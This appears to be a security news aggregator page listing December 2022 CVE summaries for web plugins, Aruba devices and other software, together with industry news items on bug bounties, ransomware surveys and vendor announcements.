What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-12-12 21:15:10 | CVE-2022-46904 (lien direct) | Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Self-XSS. | Guideline | ||
|
2022-12-12 21:15:10 | CVE-2022-46906 (lien direct) | Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Reflected XSS. | Guideline | ||
|
2022-12-12 21:15:10 | CVE-2022-46903 (lien direct) | Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an authenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Stored XSS. | Guideline | ||
|
2022-12-12 21:15:10 | CVE-2022-46905 (lien direct) | Insufficient processing of user input in WebSoft HCM 2021.2.3.327 allows an unauthenticated attacker to inject arbitrary HTML tags into the page processed by the user's browser, including scripts in the JavaScript programming language, which leads to Reflected XSS. | Guideline | ||
|
2022-12-12 18:15:13 | CVE-2022-4097 (lien direct) | The All-In-One Security (AIOS) WordPress plugin before 5.0.8 is susceptible to IP Spoofing attacks, which can lead to bypassed security features (like IP blocks, rate limiting, brute force protection, and more). | Guideline | ||
|
2022-12-12 18:15:12 | CVE-2022-3981 (lien direct) | The Icegram Express WordPress plugin before 5.5.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscriber | Guideline | ||
|
2022-12-12 18:15:12 | CVE-2022-3925 (lien direct) | The buddybadges WordPress plugin through 1.0.0 does not sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users | Guideline | ||
|
2022-12-12 18:15:11 | CVE-2022-3908 (lien direct) | The Helloprint WordPress plugin before 1.4.7 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting | Guideline | ||
|
2022-12-12 18:15:11 | CVE-2022-3921 (lien direct) | The does not validate files to be uploaded via an AJAX action available to unauthenticated users, which could allow them to upload arbitrary files and lead to RCE | Guideline | ||
|
2022-12-12 18:15:11 | CVE-2022-3915 (lien direct) | The Dokan WordPress plugin before 3.7.6 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users | Guideline | ||
|
2022-12-12 18:15:10 | CVE-2022-3359 (lien direct) | The Shortcodes and extra features for Phlox WordPress plugin through 2.10.5 unserializes the content of an imported file, which could lead to PHP object injection when a user imports (intentionally or not) a malicious file and a suitable gadget chain is present on the blog. | Guideline | ||
|
2022-12-12 18:15:10 | CVE-2022-3605 (lien direct) | The WP CSV Exporter WordPress plugin before 1.3.7 does not properly escape the fields when exporting data as CSV, leading to a CSV injection vulnerability. | Guideline | ||
 |
2022-12-12 18:02:25 | Check Point CloudGuard AppSec is the only product known to pre-emptively block Claroty WAF bypass (lien direct) | >By Oded Gonda, VP Technology and Innovation, Check Point Claroty Team82 has developed a generic bypass for industry-leading web application firewalls (WAF). The bypass technique involves appending JSON syntax to SQL injection payloads that a WAF is unable to parse. It is explained in a detailed blog that was published on December 8th, 2022. As… | Guideline | ★★ | |
 |
2022-12-12 14:31:18 | Axis Communications launches private bug bounty program with Bugcrowd (lien direct) | Axis Communications launches private bug bounty program with Bugcrowd, leaders in crowdsourced cybersecurity. Axis Communications, an approved Common Vulnerability and Exposures (CVE) Numbering Authority (CNA), is launching a private bug bounty program with Bugcrowd, the leader in crowdsourced cybersecurity. The private bug bounty program strengthens Axis' commitment to building professional relationships with external security researchers and ethical hackers. The new program reinforces the company's efforts to proactively identify, patch, and disclose vulnerabilities in AXIS OS, the Linux-based operating system that drives most Axis products. - Product Reviews | Vulnerability Guideline | ★★★ | |
|
2022-12-12 14:15:10 | CVE-2022-4421 (lien direct) | A vulnerability was found in rAthena FluxCP. It has been classified as problematic. Affected is an unknown function of the file themes/default/servicedesk/view.php of the component Service Desk Image URL Handler. The manipulation of the argument sslink leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 8a39b2b2bf28353b3503ff1421862393db15aa7e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215304. | Vulnerability Guideline | ||
|
2022-12-12 14:15:10 | CVE-2021-4244 (lien direct) | A vulnerability classified as problematic has been found in yikes-inc-easy-mailchimp-extender Plugin up to 6.8.5. This affects an unknown part of the file admin/partials/ajax/add_field_to_form.php. The manipulation of the argument field_name/merge_tag/field_type/list_id leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 6.8.6 is able to address this issue. The name of the patch is 3662c6593aa1bb4286781214891d26de2e947695. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215307. | Vulnerability Guideline | ||
|
2022-12-12 14:15:10 | CVE-2021-4243 (lien direct) | A vulnerability was found in claviska jquery-minicolors up to 2.3.5. It has been rated as problematic. Affected by this issue is some unknown functionality of the file jquery.minicolors.js. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 2.3.6 is able to address this issue. The name of the patch is ef134824a7f4110ada53ea6c173111a4fa2f48f3. It is recommended to upgrade the affected component. VDB-215306 is the identifier assigned to this vulnerability. | Vulnerability Guideline | ||
|
2022-12-12 13:15:15 | CVE-2022-44533 (lien direct) | A vulnerability in the Aruba EdgeConnect Enterprise web management interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Vulnerability Guideline | ||
|
2022-12-12 13:15:14 | CVE-2022-3510 (lien direct) | A parsing issue similar to CVE-2022-3171, but with Message-Type Extensions in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. | Guideline | ||
|
2022-12-12 13:15:14 | CVE-2022-43541 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:14 | CVE-2022-43542 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:14 | CVE-2022-3509 (lien direct) | A parsing issue similar to CVE-2022-3171, but with textformat in protobuf-java core and lite versions prior to 3.21.7, 3.20.3, 3.19.6 and 3.16.3 can lead to a denial of service attack. Inputs containing multiple instances of non-repeated embedded messages with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. We recommend updating to the versions mentioned above. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37921 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37920 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37922 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37909 (lien direct) | Aruba has identified certain configurations of ArubaOS that can lead to sensitive information disclosure from the configured ESSIDs. The scenarios in which disclosure of potentially sensitive information can occur are complex, and depend on factors beyond the control of attackers. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37924 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:13 | CVE-2022-37923 (lien direct) | Vulnerabilities in the Aruba EdgeConnect Enterprise command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise in Aruba EdgeConnect Enterprise Software version(s): ECOS 9.2.1.0 and below; ECOS 9.1.3.0 and below; ECOS 9.0.7.0 and below; ECOS 8.3.7.1 and below. | Guideline | ||
|
2022-12-12 13:15:12 | CVE-2022-37897 (lien direct) | There is a command injection vulnerability that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system. | Vulnerability Guideline | ||
|
2022-12-12 13:15:12 | CVE-2022-37903 (lien direct) | A vulnerability exists that allows an authenticated attacker to overwrite an arbitrary file with attacker-controlled content via the web interface. Successful exploitation of this vulnerability could lead to full compromise the underlying host operating system. | Vulnerability Guideline | ||
|
2022-12-12 13:15:11 | CVE-2021-3821 (lien direct) | A potential security vulnerability has been identified for certain HP multifunction printers (MFPs). The vulnerability may lead to Denial of Service when running HP Workpath solutions on potentially affected products. | Vulnerability Guideline | ||
 |
2022-12-12 11:00:00 | Ransomware: Which Industries Are Most Likely to Pay (lien direct) |
A recent study by Cybereason, Ransomware: The True Cost to Business 2022, revealed that 73% of respondents had experienced a ransomware attack in the last 24 months. Of those respondents, 28% said their organizations paid the ransom. A separate survey of cybersecurity leaders conducted by WSJ Pro Research found that 42.5% of respondents said they would consider paying a ransom. |
Ransomware Guideline | ★★★★ | |
 |
2022-12-12 07:30:13 | IT security teams, business execs still not on same page (lien direct) | Also: Guri the air-gap guru strikes again, while pro-Ukraine hackers set up a proxy network in Russia In brief Let's start with the good news: according to a survey of security and business leaders, executives have become far more aware of the importance of cyber security in the past two years, better aligning security teams and leadership. … | Guideline | ★★ | |
|
2022-12-12 07:15:16 | CVE-2022-4416 (lien direct) | A vulnerability was found in RainyGao DocSys. It has been declared as critical. This vulnerability affects the function getReposAllUsers of the file /DocSystem/Repos/getReposAllUsers.do. The manipulation of the argument searchWord/reposId leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-215278 is the identifier assigned to this vulnerability. | Vulnerability Guideline | ||
|
2022-12-11 15:15:09 | CVE-2022-4403 (lien direct) | A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215272. | Vulnerability Guideline | ||
|
2022-12-11 08:15:09 | CVE-2022-4400 (lien direct) | A vulnerability was found in zbl1996 FS-Blog and classified as problematic. This issue affects some unknown processing of the component Title Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-215267. | Vulnerability Guideline | ||
|
2022-12-11 08:15:09 | CVE-2022-4402 (lien direct) | A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271. | Vulnerability Guideline | ||
|
2022-12-11 08:15:09 | CVE-2022-4401 (lien direct) | A vulnerability was found in pallidlight online-course-selection-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-215268. | Vulnerability Guideline | ||
|
2022-12-10 22:15:17 | CVE-2022-4399 (lien direct) | A vulnerability was found in TicklishHoneyBee nodau. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/db.c. The manipulation of the argument value/name leads to sql injection. The name of the patch is 7a7d737a3929f335b9717ddbd31db91151b69ad2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215252. | Vulnerability Guideline | ||
|
2022-12-10 19:15:10 | CVE-2022-4397 (lien direct) | A vulnerability was found in morontt zend-blog-number-2. It has been classified as problematic. Affected is an unknown function of the file application/forms/Comment.php of the component Comment Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 36b2d4abe20a6245e4f8df7a4b14e130b24d429d. It is recommended to apply a patch to fix this issue. VDB-215250 is the identifier assigned to this vulnerability. | Vulnerability Guideline | ||
|
2022-12-10 12:15:10 | CVE-2022-4396 (lien direct) | ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in RDFlib pyrdfa3 and classified as problematic. This issue affects the function _get_option of the file pyRdfa/__init__.py. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is ffd1d62dd50d5f4190013b39cedcdfbd81f3ce3e. It is recommended to apply a patch to fix this issue. The identifier VDB-215249 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. | Vulnerability Guideline | ||
|
2022-12-09 19:15:13 | CVE-2022-41299 (lien direct) | IBM Cloud Transformation Advisor 2.0.1 through 3.3.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 237214. | Vulnerability Guideline | ||
 |
2022-12-09 13:00:31 | Preparing for 2023 and what lies in store for Endpoint Security (lien direct) | Cisco surveyed 100 IT & security leaders on the Gartner Peer Insights platform to understand their level of security and their view on endpoint security's future. | Guideline | ★★★ | |
|
2022-12-09 08:15:10 | CVE-2022-4377 (lien direct) | A vulnerability was found in S-CMS 5.0 Build 20220328. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Contact Information Page. The manipulation of the argument Make a Call leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215197 was assigned to this vulnerability. | Vulnerability Guideline | ||
|
2022-12-09 08:15:09 | CVE-2022-4375 (lien direct) | A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196. | Vulnerability Guideline | ||
|
2022-12-08 18:15:10 | CVE-2022-46827 (lien direct) | In JetBrains IntelliJ IDEA before 2022.3 an XXE attack leading to SSRF via requests to custom plugin repositories was possible. | Guideline | ||
|
2022-12-08 18:11:26 | Salt Security API Protection Platform Wins Gold in 2022 Best in Biz Awards (lien direct) | Salt Security API Protection Platform Wins Gold in 2022 Best in Biz Awards API security leader receives first place recognition in "Enterprise Product of the Year – Security Software" category - Business News | Guideline | ★★ | |
|
2022-12-08 15:15:10 | CVE-2022-4364 (lien direct) | A vulnerability classified as critical has been found in Teledyne FLIR AX8 up to 1.46.16. Affected is an unknown function of the file palette.php of the component Web Service Handler. The manipulation of the argument palette leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-215118 is the identifier assigned to this vulnerability. | Vulnerability Guideline | ||
|
2022-12-08 15:03:31 | Checkmarx Fortifies Executive Team with Appointment of Amit Daniel as Global Chief Marketing Officer (lien direct) | Checkmarx Fortifies Executive Team with Appointment of Amit Daniel as Global Chief Marketing Officer 20-year technology and cybersecurity industry veteran will drive global marketing and growth strategies for leading application security platform provider - Business News | Guideline | ★★ | |
 |
2022-12-08 13:30:00 | #BHEU: Time for Cyber Pros to Shape the Industry\'s Future (lien direct) | Jen Ellis urges the cyber industry to take a leading role in shaping its future, during Black Hat Europe 2022 | Guideline | ★★ |
To see everything:
Our RSS (filtrered)
